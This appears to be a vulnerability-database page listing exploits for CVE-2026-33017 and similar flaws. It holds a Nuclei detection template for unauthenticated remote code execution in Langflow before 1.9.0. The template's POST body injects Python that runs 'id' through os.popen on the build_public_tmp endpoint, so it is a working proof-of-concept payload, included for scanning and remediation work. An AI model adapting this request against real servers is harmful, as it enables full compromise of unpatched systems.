| Reporter | Title | Published | Views | Family All 44 |
|---|---|---|---|---|
| Exploit for Command Injection in Paloaltonetworks Pan-Os | 30 Mar 202613:39 | – | githubexploit | |
| Exploit for Code Injection in Langflow | 22 May 202622:01 | – | githubexploit | |
| Exploit for Code Injection in Langflow | 13 Apr 202618:33 | – | githubexploit | |
| Exploit for Code Injection in Langflow | 20 Apr 202614:54 | – | githubexploit | |
| Exploit for Eval Injection in Langflow | 2 Jul 202609:47 | – | githubexploit | |
| Exploit for CVE-2026-33017 | 21 Mar 202617:06 | – | githubexploit | |
| Exploit for Eval Injection in Langflow | 27 Mar 202607:15 | – | githubexploit | |
| Exploit for Eval Injection in Langflow | 7 Apr 202623:54 | – | githubexploit | |
| Exploit for Cross-site Scripting in B3Log Siyuan | 12 May 202619:20 | – | githubexploit | |
| Exploit for CVE-2026-33017 | 21 Mar 202608:11 | – | githubexploit |
id: CVE-2026-33017
info:
name: Langflow < 1.9.0 - Remote Code Execution
author: himind
severity: critical
description: |
Langflow versions prior to 1.9.0 are vulnerable to unauthenticated remote code execution (RCE) via the build_public_tmp endpoint. Attackers can submit a manipulated flow JSON containing Python code that is executed during the build process without proper sandboxing.
impact: |
Remote attackers can execute arbitrary Python code without authentication, leading to full system compromise.
remediation: |
Update to version 1.9.0 or later.
reference:
- https://thehackernews.com/2026/03/critical-langflow-flaw-cve-2026-33017.html
- https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours
- https://nvd.nist.gov/vuln/detail/CVE-2026-33017
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-33017
epss-score: 0.98412
epss-percentile: 0.99912
cwe-id: CWE-94
metadata:
verified: true
max-request: 2
vendor: langflow
product: langflow
shodan-query: http.favicon.hash:1727196746
tags: cve,cve2026,langflow,rce,ai,passive,kev,vkev
variables:
uuid: "{{uuid}}"
flow: http(1) || http(2)
http:
- method: POST
path:
- "{{BaseURL}}/api/v1/build_public_tmp/{{uuid}}/flow"
body: |
{
"data": {
"nodes": [
{
"data": {
"node": {
"template": {
"code": {
"value": "def function():\n import os\n return os.popen('id').read()"
}
}
}
}
}
]
}
}
headers:
Content-Type: application/json
matchers:
- type: dsl
dsl:
- 'contains(content_type, "application/json")'
- 'regex("uid=[0-9]+.*gid=[0-9]+.*", body)'
- 'contains(body, "xmsg\":")'
condition: and
- method: GET
path:
- "{{BaseURL}}/api/v1/version"
matchers:
- type: dsl
dsl:
- "compare_versions(version, '< 1.9.0')"
- "status_code == 200"
condition: and
extractors:
- type: json
name: version
json:
- ".version"
internal: true
# digest: 4a0a00473045022100ab5b805568f40e529c0d7a4de61d40901dd6079313bfdba33df7e093d7f58c3f0220096079b98e20f164e709a2ba0f517fde245e73419e6ebb7e2a8292ad4ea98925:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation